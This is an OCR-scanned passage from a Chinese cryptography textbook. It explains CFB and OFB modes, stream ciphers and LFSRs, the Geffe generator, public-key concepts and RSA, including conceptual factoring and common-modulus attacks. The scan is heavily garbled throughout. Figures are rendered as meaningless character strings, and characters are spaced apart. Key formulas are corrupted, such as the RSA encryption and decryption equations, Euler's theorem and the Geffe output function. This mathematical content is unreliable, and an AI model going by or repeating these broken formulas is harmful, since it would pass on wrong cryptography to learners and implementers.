在 CFB 模式 下 ,可 以 利用 分 组 密码 实现 实时 的 流 操作 。 将 发 送 的 字符 流 中 任何 一 个 
字符 用 面向 字符 的 工作 模式 加 密 后 立即 发 送 , 其 原理 如 图 4-10 所 示 , 其 中 传输 单元 ( 移 位 
寄存 器 ) 是 * 比特 ,一 般 ;二 8。 此 时 ,明文 被 分 成 ;比特 的 片段 而 不 是 使 用 的 基本 分 组 密 
码 的 分 组 长 度 。 使 用 CFB 模式 时 ,任意 明文 单元 的 密 文 都 是 前 面 所 有 明文 的 函数 。 


加 密 过 程 | | 一 | 
IV 初 始 值 ds |s| ds | 
1 4 d a d 
密 明 -| 放 密 | 副 站 风 
ta d d 
时 d-s s d-s | $ d-s 
s Ys s 
-=| Ci 上 十 | C, | Cn 
s Ss 3 
Pp Pp, P， 
解密 过 各 = | == | 
IV 初 始 值 d-s Ss d-s 8 
ci gt 5 4 
一 一 一 加 密 一 = 加 密 一 一 加 密 
14 1 4 1 2 
大 d-s 刀 d-s | 了 d-s 
Ss 5 s 
co 5 C 5 C 
过 人 
Pi Pp, P， 


图 4-10 密码 反馈 (CFB) 模 式 


加 密 时 , 设 加 密 算法 的 输入 是 d 比特 移 位 寄存 器 ,其 初 值 为 某 个 初始 向 量 IV。 加 密 
算法 输出 的 最 左 ( 最 高 有 效 位 )s 比特 与 明文 的 第 一 个 单元 P, 进行 异 或 ,产生 出 密 文 的 第 
1 个 单元 Ci 。 传 送 该 单元 并 将 输入 寄存 器 的 内 容 左 移 * 位 ,用 Ci 补 齐 最 右边 (最 低 有 效 
位 )s 位 。 这 一 过 程 继续 到 明文 的 所 有 单元 都 被 加 密 为 止 。 解 密 时 ,将 加 密 算法 输出 的 最 
左 (最 高 有 效 位 )s 比特 与 密 文 的 相应 单元 异 或 产生 明文 ,反馈 到 输入 寄存 器 的 值 为 密 文 
单元 。 注 意 在 数据 解密 过 程 中 使 用 的 是 指定 分 组 密码 的 加 密 算法 而 不 是 解密 算法 。 

在 CFB 模式 中 ,需要 额外 的 初始 向 量 ,消息 被 看 作 比特 流 , 无 须 分 组 填充 ,无 须 整个 
数据 分 组 在 接收 完 后 才能 进行 加 解密 。 所 有 加 密 都 使 用 同一 密 钥 , 密 文 块 需 按 顺 序 逐 一 
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解密 。 另 外 ,数据 加 解密 的 速率 降低 ,其 数据 率 不 会 太 高 ,同时 对 信道 错误 较 敏 感 且 会 造 


成 错误 传播 。 

4) 输出 反馈 模式 

OFB 模式 与 CFB 模式 相似 ,不 同 之 处 在 于 OFB 模式 将 前 一 次 加 密 算法 输出 的 比 
特 反馈 送 入 移 位 寄存 器 的 最 右边 (如 图 4-11 所 示 ) ,而 CFB 模式 是 将 密 文 单元 反馈 到 移 
位 寄存 器 中 。 因 为 OFB 模式 的 反馈 机 制 独立 于 明文 和 密 文 , 这 种 方法 也 被 称 为 “内 部 


反馈 ”。 


加 密 过 各 1 | = 
IV 初 始 值 d-s Ss ds s 
1 1 4 罗 ba 
全 钥 .| 遍 窗 宣 胃 _[ 斩 窜 | 人 i 
1 4 1 4 1 4 
[ Gy i d-s | 5 d-s 
i 下 s 
中 一 站 C2 Cn 
5 s s 
Pi Pp Pp, 
解密 过 程 1 1 i 1 
IV 初 始 值 dy Ss dy Ss 
多 多 一 gH 4 
一 一 | 加 密 一 一 = 加 密 党 一 一 一 加 密 
到 1 4 1 4 
| as *] ws | s| ds 
is s s 
Ci C: Cn 
及 s 
Pi Pp P， 


4-11 输出 反馈 (OFB) 模 式 


在 OFB 模式 中 ,初始 向 量 IV 无 须 保密 ,但 各 条 消息 必须 选用 不 同 的 IV; 密 钥 相 同 
时 ,明文 中 相同 的 组 产生 不 相同 的 密 文 块 。CFB 模式 和 OFB 模式 都 是 将 消息 看 作 比 特 
流 , 无 须 分 组 填充 。OFB 模式 是 CFB 模式 的 一 种 改进 ,不 存在 比特 错误 传播 ; 密 钥 流 可 
以 在 已 知 消息 之 前 计算 ,不 需要 按 顺 序 解密 。 但 是 ,OFB 模式 比 CFB 模式 更 易 受 到 对 消 
息 流 的 算 改 攻击 ,比如 在 密 文 中 取 1 比特 的 补 , 那 么 在 恢复 的 明文 中 相应 位 置 的 比特 也 为 
原 比 特 的 补 。 因 此 使 得 敌手 有 可 能 通过 同时 对 消息 校 验 部 分 的 算 改 和 对 数据 部 分 的 算 
改 , 而 以 纠 错 码 不 能 检测 的 方式 算 改 密 文 。 


422 序列 密码 


序列 密码 (又 称 为 流 密码 ) 是 一 个 重要 的 密码 体制 ,也 是 手工 和 机 械 密码 时 代 的 主流 
密码 。 序 列 密码 通常 认为 起 源 于 20 世纪 20 年 代 的 Vernam 密码 ,Vernam 密码 中 的 密 钥 
序列 要 求 是 随机 序列 (“一 次 一 密 ” 密 码 体制 ) ,由 于 随机 密 钥 序列 的 产生 、 存 储 以 及 分 配 等 
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方面 存在 一 定 的 困难 ,Vernam 体制 在 当时 并 没有 得 到 广泛 的 应 用 。 在 20 世纪 50 年 代 ， 
由 于 数字 电子 技术 的 发 展 ,使 密 钥 序列 可 以 方便 地 利用 以 移 位 寄存 器 为 基础 的 电路 来 产 
生 , 从 而 促使 线性 和 非 线性 移 位 寄存 器 理论 迅速 发 展 ,再 加 上 有 效 的 数学 工具 ,如 代数 和 
谱 分 析 理 论 的 引入 ,使 得 序列 密码 理论 迅速 发 展 , 并 逐步 走向 成 熟 阶段 。 同 时 由 于 具有 实 
现 简单 、 速 度 快 ,以 及 错误 传播 少 的 优点 ,使 序列 密码 在 实际 应 用 中 ,特别 是 在 专用 和 机 密 
机 构 中 仍 保持 优势 。 

序列 密码 属于 对 称 密码 体制 ,与 分 组 密码 相 比 较 : 分 组 密码 把 明文 分 成 相对 比较 大 
的 块 ,对 于 每 块 使 用 相同 的 加 密 函 数 进行 处 理 。 分 组 密码 是 无 记忆 的 。 序 列 密码 处 理 的 
明文 长 度 为 1 比特 ,而 且 序列 密码 是 有 记忆 的 。 序 列 密码 又 被 称 为 状态 密码 ,因为 它 的 加 
密 不 仅 与 密 钥 和 明文 有 关系 ,还 和 当前 状态 有 关 。 两 者 区 别 不 是 绝对 的 , 若 把 分 组 密码 增 
加 少量 的 记忆 模块 就 形成 了 一 种 序列 密码 。 

序列 密码 通常 划分 为 同步 序列 密码 和 自 同步 序列 密码 两 大 类 。 

如 果 密 钥 序 列 的 产生 独立 于 明文 消息 , 则 此 类 序列 密码 为 同步 序列 密码 。 在 同步 序 
列 密码 中 , 密 ( 明 ) 文 符号 是 独立 的 ,一 个 错误 传输 只 会 影响 一 个 符号 ,不 影响 后 面 的 符号 。 
但 其 缺点 是 : 一 旦 接收 端 和 发 送 端的 种 子 密 钥 和 内 部 状态 不 同步 ,解密 就 会 失败 ,两 者 必 
须 立 即 借助 外 界 手段 重新 建立 同步 。 

如 果 密 钥 序 列 的 产生 是 密 钥 及 固定 大 小 的 以 往 密 文 位 的 函数 , 则 这 种 序列 密码 被 称 
为 自 同步 序列 密码 或 非 同 步 序 列 密码 。 自 同步 序列 密码 的 优点 是 即使 接收 端 和 发 送 端 不 
同步 ,只 要 接收 端 能 连续 地 正确 接收 到 个 密 文 符号 ,就 能 重新 建立 同步 。 因 此 自 同 步 序 
列 密码 具有 有 限 的 差错 传播 , 且 较 同步 序列 密码 的 分 析 困 难得 多 。 

1. 序列 密码 原理 

序列 密码 是 将 明文 划分 成 字符 (如 单个 字母 ) ,或 其 编码 的 基本 单元 (如 0,1 数字 ) , 字 
符 分 别 与 密 钥 序 列 作用 进行 加 密 , 解 密 时 以 同步 产生 的 同样 的 密 钥 序列 实现 ,其 基本 框图 
如 图 4-12 所 示 。 保 持 收发 两 端 密 钥 序列 的 精确 同步 是 实现 可 靠 解密 的 前 提 。 


明文 序列 。 密 文 序列 密 文 序列 明文 序列 
Pe1…PiPo Cn-1*%C1C0 , 
业 1 
1 
密 钥 序列 | | 密 钥 序列 
ht hiko | | eh 
密 钥 序列 产生 器 |= | 密 钥 序列 产生 器 
下 下 
种 子 密 钥 K [一 一 秘密 信道 一 一 | 种 子 密 钥 K 


图 4-12 序列 密码 体制 框图 


种 子 密 钥 kK 控制 密 钥 序列 产生 器 ,产生 密 钥 序 列 明文 序列 {&;} ,i 宇 0。 明 文 序列 二 
mmz*…mi"… (miE M) 与 密 钥 序列 比特 进行 模 2 加 ,产生 密 文 序列 c= 二 cico*…ci… ,其 中 ci 二 
E(ki,mi) 二 mi 外 ki;。 若 密 钥 序 列 是 一 个 完全 随机 的 非 周期 序列 , 则 可 以 实现 一 次 一 密 
体制 。 
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序列 密码 的 安全 强度 主要 依赖 密 钥 序列 的 随机 性 ,因此 设计 一 个 好 的 密 钥 序列 产生 
器 ,使 其 产生 随机 的 密 钥 序列 是 序列 密码 体制 的 关键 。 

密 钥 序列 产生 器 的 内 部 可 将 其 分 成 两 个 部 分 一 一 驱动 部 分 和 非 线性 组 合 部 分 (如 
图 4-13) ,其 中 驱动 部 分 产生 控制 生成 器 的 状态 序列 ,并 控制 生成 器 的 周期 和 统计 特 
性 。 非 线性 组 合 部 分 对 驱动 部 分 的 各 个 输出 序列 进行 非 线 性 组 合 ,控制 和 提高 产生 器 
输出 序列 的 统计 特性 、 线 性 复杂 度 和 不 可 预测 性 等 ,从 而 保证 输出 密 钥 序 列 的 安全 
强度 。 


驱动 器 | :， “| 组 合 [一 一 一 密 钥 序列 


生生 三 = 二 一 1 | 
1 
1 
1 
1 


十 一 一 密 钥 序列 


图 4-13 密 钥 序列 产生 器 组 成 


密 钥 序 列 生 成 器 的 设计 基本 要 求 如 下 : 

(1) 种 子 密 钥 K 的 长 度 足 够 大 ,一 般 应 在 128 位 以 上 ; 

(2) 密 钥 序 列 产生 器 生成 的 密 钥 序列 {A;} 具 极 大 周期 ; 

(3) 密 钥 序列 {&;} 具 有 均匀 的 六 元 分 布 , 即 在 一 个 周期 环 上 , 某 特 定形 式 的 六 长 bit 
串 与 其 求 反 ,两 者 出 现 的 频数 大 抵 相 当 ; 

(4) 利用 统计 方法 由 密 钥 序列 {&;} 提 取 关于 种 子 密 钥 K 的 信息 在 计算 上 不 可 行 ; 

(5) 种 子 密 钥 kK 任 一 位 的 改变 要 引起 密 钥 序列 {&;) 在 全 貌 上 的 变化 ; 

(6) 密 钥 序列 {&;} 不 可 预测 。 密 文 及 相应 明文 的 部 分 信息 ,不 能 确定 整个 密 钥 序列 。 

为 了 保证 输出 密 钥 序列 的 安全 强度 ,对 组 合 函 数 民有 下 列 要 求 ， 

(1) 下 将 驱动 序列 变换 为 滚动 密 钥 序列 , 当 输 入 二 元 随机 序列 时 ,输出 也 为 二 元 随机 
序列 ; 

(2) 对 给 定 周期 的 输入 序列 ,构造 的 下 使 输出 序列 的 周期 尽 可 能 大 ; 

(3) 对 给 定 复杂 度 的 输入 序列 ,应 构造 下 使 输出 序列 的 复杂 度 尽 可 能 大 ; 

(4) 下 的 信息 泄露 极 小 化 (从 输出 难以 提取 有 关 密 钥 序 列 产 生 器 的 结构 信息 ); 

(5) 下 应 易于 工程 实现 ,工作 速度 极 高 ; 

(6) 在 需要 时 ,下 易于 在 密 钥 控制 下 工作 。 

驱动 器 一 般 利用 线性 反馈 移 位 寄存 器 (Linear Feedback Shift Register,LFSR) ,特别 
是 利用 最 长 周期 或 m 序列 产生 器 实现 。 

2. 线性 反馈 移 位 寄存 器 

序列 密码 的 关键 是 设计 一 个 随机 性 好 的 密 钥 序列 发 生 器 ,为 了 研究 密 钥 序列 产生 器 ， 
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挪威 政府 的 首席 密码 学 家 Ernst Selmer 于 1965 年 提出 了 移 位 寄存 器 理论 , 它 是 序列 密码 
中 研究 随机 密 钥 流 的 主要 数学 工具 。 尤 其 是 线性 反馈 移 位 寄存 器 , 因 其 实现 简单 、 速 度 
快 .有 较为 成 熟 的 理论 等 优点 ,而 成 为 构造 密码 流 生成 器 的 最 重要 部 件 之 一 。 

反馈 移 位 寄存 器 (Feedback Shift Register, FSR) 是 由 位 的 寄存 器 和 反馈 函数 
(feedback function) 组 成 ,如 图 4-14 所 示 ,n 位 寄存 器 中 的 初始 值 称 为 移 位 寄存 器 的 


—™| b, p= b, 


sh nn 
| mb 上 一 一 箱 由 序列 0 
反馈 函数 fb1,b,…,b,) 


图 4-14 反馈 移 位 寄存 器 


工作 原理 : 移 位 寄存 器 中 所 有 位 的 值 右 移 1 位 ,最 右边 的 一 个 寄存 器 移出 的 值 是 输 
出 位 ,最 左边 一 个 寄存 器 的 值 由 反馈 函数 的 输出 值 填充 ,此 过 程 称 为 进 动 1 拍 。 反 馈 函 数 
是 nn 个 变 元 (51,5bs，,…,b,) 的 布尔 函数 。 移 位 寄存 器 根据 需要 不 断 地 进 动 m 拍 , 便 有 洲 
位 的 输出 ,形成 输出 序列 O, ,O;,… ,0O, 。 
线性 反馈 移 位 寄存 器 (LFSR) 是 一 种 特殊 的 FSR, 其 反馈 函数 是 线性 函数 , 即 为 移 位 
寄存 器 中 某 些 位 的 异 或 ,参与 运算 的 这 些 位 叫做 抽 头 位 。 
一 个 n 阶 LFSR 的 有 效 状态 为 2 一 1( 全 0 状态 除外 , 因 全 0 状态 的 输出 序列 一 直 为 
全 0) ,也 即 理论 上 能 够 产生 周期 为 2 一 1 的 伪 随 机 序列 。 线 性 反馈 移 位 寄存 器 输出 序列 
的 性 质 完全 由 其 反馈 函数 决定 。 选 择 合适 的 反馈 函数 便 可 使 序列 的 周期 达到 最 大 值 
2" 一 1, 周 期 达到 最 大 值 的 序列 称 为 m 序列 。 
【 例 4-3〗 一 个 3 阶 的 线性 反馈 移 位 寄存 器 ,反馈 函数 f(b1 ,bs ,bs) 二 01 电 bs, 初 态 为 
(516b2b3) 二 100, 输 出 序列 生成 过 程 如 下 : 
状态 输出 位 
100 0 
110 


王 -一 一 | by =| 六 上 一 bi ooo010 


上 面 输出 序列 周期 长 度 为 7 二 2 一 1, 因 此 为 m 序列 。 

尽管 m 序列 的 随机 性 能 较 好 , 且 在 所 有 同 阶 线性 移 位 寄存 器 生成 序列 中 其 周期 最 
长 ,但 从 序列 密码 安全 性 角度 来 看 ,m 序列 并 不 适合 直接 作为 密 钥 序列 来 使 用 。 因 此 , 密 
钥 序 列 产生 器 仅 有 线性 移 位 寄存 器 是 不 够 的 ,还 需要 非 线性 组 合 部 分 。 

3. 非 线性 序列 

密 钥 序列 生成 器 可 分 解 为 驱动 部 分 和 非 线性 组 合 部 分 ,驱动 子 部 分 常用 一 个 或 多 个 
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LFSR 实现 (如 图 4-15) , 非 线 性 组 合子 部 分 用 非 线 性 组 合 函 数 下 实现 。 下 面 介 绍 第 二 部 
分 : 非 线 性 组 合子 部 分 。 

为 了 使 密 钥 序列 生成 器 输出 的 二 元 序列 尽 可 能 复杂 ,应 保证 其 周期 尽 可 能 大 、 线 性 复 
杂 度 和 不 可 预测 性 尽 可 能 高 ,因此 常 使 用 多 个 LFSR 来 构造 二 元 序列 , 称 每 个 LFSR 的 输 
出 序列 为 驱动 序列 。 

显然 密 钥 序列 生成 器 输出 序列 的 周期 不 大 于 各 驱动 序列 周期 的 乘积 ,提高 输出 序列 
的 线性 复杂 度 应 从 极 大 化 其 周期 开始 。 

密 钥 是 LFSR 的 初始 状态 ,每 次 取 一 位 并 进行 移 位 ,输出 位 是 LFSR 中 某 些 位 的 函 
数 ,最 好 是 非 线 性 的 ,这 个 函数 称 为 组 合 函数 。 整 个 发 生 器 称 为 组 合 发 生 器 。 

一 般 来 说 ,驱动 部 分 可 由 m 序列 或 其 他 长 周期 的 LFSR 序列 组 成 ,用 于 控制 密 钥 流 
生成 器 的 状态 序列 ,并 为 非 线 性 组 合 部 分 提供 伪 随 机 性 质 良 好 的 序列 ; 非 线性 组 合 部 分 利 
用 驱动 部 分 生成 的 状态 序列 生成 满足 要 求 的 密码 特性 好 的 密 钥 流 序列 。 

密 钥 序 列 生 成 器 机 理 符合 香农 的 “扩散 ”和 “混淆 "两 条 密码 学 的 基本 原则 。 了 驱动 部 分 
利用 LFSR 将 密 钥 扩散 成 周期 很 大 的 状态 序列 ,而 状态 序列 与 密 钥 间 的 关系 经 非 线 
性 组 合 混淆 后 被 隐蔽 。 

【 例 4-4】 组 合 发 生 器 实例 一 一 Geffe 发 生 器 ( 见 图 4-16)。 


LFSRI ~ 复合 器 
LFSR2 | 
LFSR2 | 上 二- 和 本 
: LFSR-3 ”一 一 | 选择 控制 
WE LESR-1 Cul 
图 4-15 密 钥 序列 生成 器 的 组 成 图 4-16 ”Geffe 发 生 器 


Geffe 发 生 器 由 两 个 LFSR 作为 复合 器 的 输入 ,第 三 个 LFSR 控制 复合 器 的 输出 。 如 
果 w .as 和 os 是 三 个 LFSR 的 输出 , 则 Geffe 发 生 器 的 输出 表示 为 : 
b=(a Ma)Ba Ma)= a Ma)Ba Acas) 中 必 
这 个 发 生 器 的 周期 是 三 个 LFSR 周期 的 最 小 公 倍 数 , 它 能 实现 序列 周期 的 极 大 化 , 且 
0 和 1 之 间 的 分 布 大 体 是 平衡 的 。 


4.3 非 对称 密 码 体制 


对 称 密码 体制 虽然 可 以 在 一 定 程度 上 解决 保密 通信 的 问题 ,但 随 着 计算 机 和 网 络 的 
飞速 发 展 ,保密 通信 的 需求 越 来 越 广泛 ,对 称 密码 体制 的 局 限 性 就 逐渐 表现 出 来 ,主要 表 
现在 : 

(1) 密 钥 分 配 问 题 。 通 信 双 方 要 进行 加 密 通 信 , 需 要 通过 秘密 的 安全 信道 协商 加 密 
密 钥 ,而 这 种 安全 信道 可 能 很 难 实现 。 

(2) 密 钥 管理 问题 。 在 有 多 个 用 户 的 网 络 中 ,任何 两 个 用 户 之 间 都 需要 有 共享 的 密 
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钥 , 当 网 络 中 的 用 户 n 很 大 时 ,需要 管理 的 密 钥 数目 非常 大 。 

(3) 难以 实现 不 可 否认 功能 。 当 用 户 A 收 到 用 户 B 的 消息 时 ,无 法 向 第 三 方 证 明 此 
消息 确实 来 源 于 B, 也 无 法 防止 事后 B 否认 发 送 过 消息 。 

非 对 称 密码 体制 (asymmetric cryptosystems) 为 密码 学 的 发 展 提供 了 新 的 理论 和 技 
术 思 想 ,是 现代 密码 学 最 重要 的 发 明 ,也 可 以 说 是 密码 学 发 展 史上 最 伟大 的 革命 。 一 方 
面 , 非 对 称 密码 的 算法 是 基于 数学 函数 的 ,而 不 是 建立 在 字符 或 位 方式 操作 上 的 。 另 一 方 
面 ,与 对 称 密码 加 、 解 密使 用 同一 密 钥 不 同 , 非 对 称 密码 使 用 两 个 独立 的 密 钥 , 且 加 密 密 钥 
可 以 公开 ,因此 又 称 为 公 钥 密码 体制 。 这 两 个 密 钥 的 使 用 对 密 钥 的 管理 .认证 都 有 重要 的 
意义 。 本 节 就 来 介绍 一 下 非 对 称 密码 的 基本 原理 、 特 点 以 及 典型 的 算法 一 一 RSA 密码 
算法 。 
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非 对 称 密码 体制 的 模型 如 图 4-17, 信 息 发 送 前 ,发 送 者 首先 要 获取 接收 者 发 布 的 加 
密 密 钥 , 加 密 时 使 用 该 密 钥 将 明文 加 密 成 密 文 ,加 密 密 钥 也 称 为 公开 密 钥 ,简称 公 钥 ; 解 密 
时 接收 者 使 用 解密 密 钥 对 密 文 进行 处 理 , 还 原 明文 ,解密 密 钥 需要 保密 ,因此 也 称 为 私有 
密 钥 ,简称 私 钥 。 非 对 称 密码 体制 的 通信 安全 性 取决 于 私 钥 的 保密 性 。 


4-17 非 对 称 加 密 体制 模型 


1976 年 Diffie 和 Hellman 在 《密码 学 的 新 方向 ) 一 文中 提出 了 公 钥 密码 的 思想 ,他 们 
虽然 没有 给 出 一 个 真正 的 公 钥 密码 算法 ,但 首次 提出 了 单 向 陷 门 函数 的 概念 ,将 公 钥 密码 
体制 的 研究 归结 为 单 向 陷 门 函数 的 设计 ,为 公 钥 密 码 的 研究 指明 了 方向 。 

如 果 函 数 f(x) 被 称 为 单 向 陷 门 函数 ,必须 满足 以 下 三 个 条 件 : 

(1) 给 定 z, 计 算 : y= 二 f(z) 是 容易 的 ; 

(2) 给 定 y, 计 算 z 使 y= 二 f(z) 是 困难 的 (所 谓 计算 z=f7!1(y) 困 难 是 指 计 算 上 相当 
复杂 ,已 无 实际 意义 ); 

(3) 存在 6, 已 知 6 时 对 给 定 的 任何 y, 若 相应 的 x 存在 , 则 计算 zx 使 y= 了 f(z) 是 容 
易 的 。 

对 于 以 上 条 件 仅 满足 (1)、(2) 两 条 的 称 为 单 向 函数 ;第 (3) 条 称 为 陷 门 性 ,6 称 为 陷 门 
信息 。 当 用 陷 门 函数 f 作为 加 密 函 数 时 ,可 将 f 公开 ,这 相当 于 公开 加 密 密 钥 P:。f 函 
数 的 设计 者 将 6 保密 ,用 作 解 密 密 钥 ,此 时 6 即 为 私有 密 钥 S;。 由 于 加 密 函 数 是 公开 的 ， 
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任何 人 都 可 以 将 信息 工 加 密 成 y= jz) ,然后 发 送 给 函数 的 选取 者 。 只 有 他 拥有 St ,可 
以 利用 Si ,求解 z 一 广 :(Cy)。 单 向 陷 门 函数 的 第 (2) 条 性 质 也 表明 窃听 者 由 截获 的 密 文 
2 一 Fz) 推 测 zx 是 不 可 行 的 。 

利用 公 角 密码 体制 ,通信 双方 无 须 事先 交换 密 钥 就 可 以 进行 保密 通信 。 公 钥 密 码 体 
制 可 以 提供 以 下 功能 : 

(1) 机 密 性 (Confidentiality) : 通过 数据 加 密 来 保证 非 授权 人 员 不 能 获取 机 密 信息 。 

(2) 认证 (Authentication) : 通过 数字 签名 来 验证 对 方 的 真实 身份 。 

(3) 数据 完整 性 (Data Integrity) : 通过 数字 签名 来 保证 信息 内 容 不 被 算 改 或 蔡 换 。 

(4) 不 可 抵赖 性 (Nonrepudiation) : 通过 数字 签名 来 实现 ,使 发 送 者 不 能 事后 否认 他 
发 送 过 消息 ,消息 的 接受 者 可 以 向 第 三 方 证 实 发 送 者 确实 发 出 了 消息 。 

公 钥 密码 体制 采用 的 加 密 密 钥 ( 公 钥 ) 和 解密 密 钥 ( 私 钥 ) 是 不 同 的 。 由 于 加 密 密 钥 是 
公开 的 , 密 钥 的 分 配 和 管理 就 很 简单 ,而 且 能 够 很 容易 地 实现 数字 签名 ,因此 能 够 满足 电 
子 商 务 应 用 的 需要 。 在 实际 应 用 中 , 公 钥 密码 体制 并 没有 完全 取代 对 称 密码 体制 ,这 是 因 
为 公 钥 密码 体制 是 基于 某 种 数学 难题 ,计算 非常 复杂 , 它 的 运行 速度 远 比 不 上 对 称 密码 体 
制 。 因 此 ,在 实际 应 用 中 可 以 利用 二 者 各 自 的 优点 ,采用 对 称 密码 体制 加 密 文件 ,而 采用 
公 钥 密码 体制 加 密 “ 加 密 文 件 ” 的 密 钥 , 这 就 是 混合 加 密 体制 。 混 合 加 密 体制 较 好 地 解决 
了 运算 速度 和 密 钥 分 配 管理 的 问题 。 

从 公 钥 密码 体制 的 思想 提出 以 来 ,国际 上 已 经 出 现 了 多 种 公 钥 密码 体制 。 这 些 算法 
的 安全 性 都 是 基于 复杂 的 数学 难题 。 对 于 某 种 数学 难题 ,如 果 利 用 通用 的 算法 计算 出 密 
钥 的 时 间 越 长 ,那么 基于 这 一 数学 难题 的 公 钥 密码 体制 就 被 认为 越 安全 。 根 据 所 基于 的 
数学 难题 来 分 类 , 公 钥 密码 体制 可 以 分 为 以 下 三 类 : 基于 大 整数 分 解 问题 的 公 钥 密码 体 
制 . 基 于 有 限 域 上 离散 对 数 问题 的 公 钥 密码 体制 ,基于 椭圆 曲线 离散 对 数 问 题 的 公 钥 密码 
体制 。 


432 RSA 公 钥 密码 算法 


RSA 密码 是 目前 应 用 最 广泛 的 公 钥 密码 体制 ,该 算法 是 由 美国 的 Ron Rivest、Adi 
Shamir 和 Leonard Adleman 三 人 于 1978 年 提出 的 。 它 既 能 用 于 加 密 , 又 能 用 于 数字 签 
名 ,易于 理解 和 实现 ,是 第 一 个 安全 、 实 用 的 公 钥 密码 体制 。RSA 的 基础 是 数论 的 欧 拉 定 
理 , 它 的 安全 性 依赖 于 大 整数 因子 分 解 的 困难 性 。 为 了 方便 理解 RSA 密码 算法 ,这 里 首 
先 介绍 一 下 欧 拉 定 理 和 大 整数 因子 分 解 问题 。 

1. 欧 拉 定 理 

欧 拉 函数 是 欧 拉 定理 的 核心 概念 ,其 表述 为 : 对 于 一 个 正 整 数 , 比 n 小 但 与 n 互 为 
素数 的 正 整 数 的 个 数 , 称 为 欧 拉 函数 ,用 gp (mn) 表示。 特别 地 ,如 果 p 是 素数 , 则 pg ( 思 ) 一 
Zp 一 1。 如 果 两 个 素数 p 和 g, 目 n==pq: 则 9 (7)==( p 一 1) (gq 一 1)。 

欧 拉 定理 : 车 正 整 数 a 与 n 互 素 , 则 a ?==1 mod n。 

上 述 定理 的 证 明 可 查阅 其 他 参考 资料 。 

2. 大 整数 因子 分 解 

大 整数 因子 分 解 问题 可 以 表述 为 : 已 知 p 和 g 为 两 个 大 素数 , 则 求 N= 二 pg 是 容易 
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的 ;但 已 知 N 是 两 个 大 素数 的 乘积 ,要 求 将 N 分 解 , 则 在 计算 上 是 困难 的 ,其 运行 时 间 程 
度 接近 于 不 可 行 。 实 际 上 ,如 果 一 个 大 的 及 个 二 进 制 数位 长 度 的 数 是 两 个 差不多 大 小 
的 素数 的 乘积 ,现在 还 没有 很 好 的 算法 能 在 多 项 式 时 间 内 分 解 它 。 

算法 时 间 复 杂 性 是 衡量 算法 有 效 性 的 常用 标准 。 如 果 输 入 规模 为 a 时 ,一 个 算法 的 
运行 时 间 复 杂 度 为 0(n) , 称 此 算法 为 线性 的 ;运行 时 间 复 杂 度 为 O(n*), 其 中 为 常量 ， 
称 此 算法 为 多 项 式 时 间 的 ; 若 有 某 常量 上 和 多 项 式 h(n), 使 算法 的 运行 时 间 复 杂 度 为 
OC ), 则 称 此 算法 为 指数 的 。 

一 般 说 来 ,在 线性 时 间 和 多 项 式 时 间 内 可 以 解决 的 问题 被 认为 是 可 行 的 ,而 任何 比 多 
项 式 时 间 更 坏 的 ,尤其 是 指数 时 间 可 解决 的 问题 被 认为 是 不 可 行 的 。 需 要 注意 的 是 ,如 果 
输入 规模 太 小 ,即使 很 复杂 的 算法 也 会 变 得 可 行 。 

3. RSA 密码 体制 描述 

选取 两 个 不 同 的 大 素数 p 和 g ,为 了 获得 最 大 程度 的 安全 性 ,p 和 g 的 长 度 一 样 。 计 
算 它 们 的 乘积 n=pg。 令 p (一 (一 1)(q 一 1) 。 

随机 选取 一 个 整数 e,1 三 e 达 gqg (7),(g (n),e) 二 1。 因 为 (gp (n),e) 二 1, 所 以 在 模 
9 (1) 下 ,计算 满足 de 二 1 mod gp(n) 的 d( 可 利用 推广 的 欧 几 里 得 除法 求 得 )。 

e 和 nn 为 公 钥 ,d 是 私 钥 。 两 个 素数 p 和 g 不 再 需要 ,可 以 销毁 ,但 决 不 能 泄漏 。 

(1) 加 密 。 加 密 消息 mr 时 ,首先 将 它 分 成 比 n 小 的 数据 分 组 。 对 于 其 中 任 一 个 分 组 
工 ,加 密 公式 为 : 

y= xmodn 
(2) 解密 。 解 密 消息 时 ,对 于 任 一 个 密 文 块 y, 我 们 计算 
X=y modn 
因为 
y modn= (zr) modn= 7x" modn= 7 modn=x 

所 以 该 公式 能 恢复 明文 r。 

4. RSA 密码 体制 的 安全 性 分 析 

(1) 分 解 大 整数 。 密 码 分 析 者 对 RSA 密码 体制 的 一 个 明显 的 攻击 是 分 解 x。 如 果 能 
做 到 这 一 点 ,那么 很 容易 就 能 计算 出 p (n) ,然后 通过 计算 d= 二 =e ' modp (n) 来 获得 私 钥 
d。 因 此 ,如 果 RSA 密码 体制 是 安全 的 ,那么 必须 n= pg 是 足够 大 的 ,使 得 分 解 它 是 计算 
上 不 可 行 的 。 目 前 的 分 解 算法 能 分 解 的 整数 已 经 达到 130 位 的 十 进 制 数 。 因 此 ,基于 安 
全 性 考虑 ,用 户 选 择 的 素数 p 和 4g 应 当 大 约 都 为 100 位 的 十 进 制 数 ,那么 x= pq 将 是 200 
位 的 十 进 制 数 。RSA 的 一 些 硬件 实现 使 用 一 个 512 位 长 的 模 ,然而 一 个 512 位 长 的 模 相 
当 于 大 约 154 位 的 十 进 制 数 ,所 以 从 长 远 的 角度 来 看 ,512 位 模 不 能 提供 足够 高 的 安 
全 性 。 

近年 来 ,RSA 密码 体制 受到 了 严重 威胁 。1999 年 8 月 27 日 ,阿姆斯特丹 国立 数学 和 
计算 机 科学 研究 所 的 研究 人 员 用 一 台 克 雷 900-16 超级 计算 机 、300 台 个 人 计算 机 以 及 专 
门 设计 的 软件 用 6 个 星期 破译 了 RSA-155 密码 。 

(2) 公共 模 攻击 。 为 了 避免 为 每 一 个 用 户 生成 不 同 的 模 n, 可 以 对 所 有 的 用 户 采 用 固 
定 的 n, 即 全 部 用 户 使 用 相同 的 n。 密 钥 分 配 中 心 能 为 用 户 i 提供 唯一 的 密 钥 对 e;、d;, 用 
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户 i 的 公 钥 为 (n,ei;), 私 钥 为 (n,d;)。 竺 一 看 ,这 样 能 正常 工作 : 发 送 给 用 户 A 的 密 文 
C= 二 Ma 不 会 被 用 户 B 解 密 ,因为 ,B 不 知道 A 的 私 钥 d。。 但 是 ,这 是 错误 的 ,由 此 产生 的 
系统 是 不 安全 的 。 因 为 ,B 能 够 用 他 的 公私 钥 对 (e, ,di) 分 解 公共 模 n。 一 旦 n 被 分 解 ,B 
可 以 很 容易 地 由 A 的 公 钥 e。 求解 私 钥 d。。 显 然 ,不 同 的 用 户 绝 不 应 该 使 用 相同 的 RSA 
模 数 。 

(3) 低 解密 指数 攻击 。 为 了 降低 解密 或 签名 生成 的 时 间 , 人 们 希望 采用 小 的 私 钥 d 
